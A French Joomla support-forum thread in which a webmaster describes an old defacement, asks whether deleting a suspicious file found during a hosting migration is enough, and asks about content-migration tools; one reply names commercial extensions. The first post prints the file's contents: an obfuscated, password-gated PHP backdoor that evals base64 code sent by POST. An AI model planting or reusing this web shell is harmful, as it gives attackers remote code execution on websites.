Connaissez vous les vieux hacks ?

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Connaissez vous les vieux hacks ?

    Bonjour,

    Le contexte

    J'ai développé un premier site Joomla en 2009 - sur une version 1.1 - et depuis le site a évolué ; j'ai eu une attaque (defacing de site) en 2013 et à ce moment là, j'ai essayé de nettoyer le site et tout semble bien se passer.

    Nous souhaitons changer d'hébergeur et nous faisons des tests chez 1 and 1 en utilisant la méthode classique : avec Akeeba backup, je fais une sauvegarde du site chez mon ancien que je ré installe chez 1&1. Leur équipe de sécurité a détecté un fichier php bizarre - explorer.php . J'ai trouvé une trace de ce hack sur le site Joomla.org dans un post daté de 2014 ...

    Mon problème

    Je crois mon site globalement sain : j'applique régulièrement toutes les mises à jour, je le scanne régulièrement avec des outils, je suis les bonnes pratiques. Je pense que ce fichier php est une scorie très ancienne ; je l'ai supprimé et tout semble bien se passer (j'ai installé une copie du site sur mon PC et j'ai scanné l'ensemble des fichiers du site à la recherche d'un appel éventuel à ce programme, je n'ai rien trouvé)

    Question 1 :

    Est-ce que ces mesures sont suffisantes ?

    Question 2 :

    J'ai l'impression que les mises à jour successives de Joomla ne font que remplacer les anciennes versions de fichier par des nouvelles et ajouter de nouveaux fichiers mais qu'il n'y a pas toujours de suppression de fichiers qui ne servent plus à rien.

    Y-a t'il un moyen de vérifier qu'il n'y a pas de vieux fichiers inutiles - des scories - sur mon site ?

    Question 3 :

    Si je devais refaire une nouvelle version de mon site en repartant de zéro, c'est à dire installer la dernière version de Joomla puis reprendre tous les contenus, existe t'il des outils pour reprendre une partie des données de l'ancien site ?

    Ma question porte sur les données qui représentent un volume important :
    - existe t'il un outil pour reprendre tous les articles et les données associées comme les catégories ?
    - existe t'il une méthode simple pour reprendre tous les menus ?

    Merci pour votre réponse

    Le contenu du fichier suspect :
    Code:
    <?php if (md5($_POST["password"]) == "084cf1c32f92386cc2ec14c956e07fdc") { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST["code"] . "'\051\051\073", ""); } ?>
    Le site concerné : https://www.libre-association-freudienne.org
    Didier L
    Le webmaster de quelques sites associatifs développés sur Joomla !

  • #2
    Bonjour,

    Je ne répondrai qu'à la question 3 : il existe en effet des extensions (commerciales) capables de transférer des données d'un site à l'autre, incluant catégories, articles, utilisateurs, menus, modules...
    Personnellement, j'ai eu l'occasion d'utiliser JMigrator ainsi que SP Upgrade (pour des transferts depuis la 2.5 vers la 3 de Joomla!) ou SP Transfer pour des transferts entres sites J! 3), mais il y en a d'autres.
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire


    • #3
      Merci RobertG pour cette réponse
      Didier L
      Le webmaster de quelques sites associatifs développés sur Joomla !

      Commentaire

      Annonce

      Réduire
      Aucune annonce pour le moment.

      Partenaire de l'association

      Réduire

      Hébergeur Web PlanetHoster
      Travaille ...
      X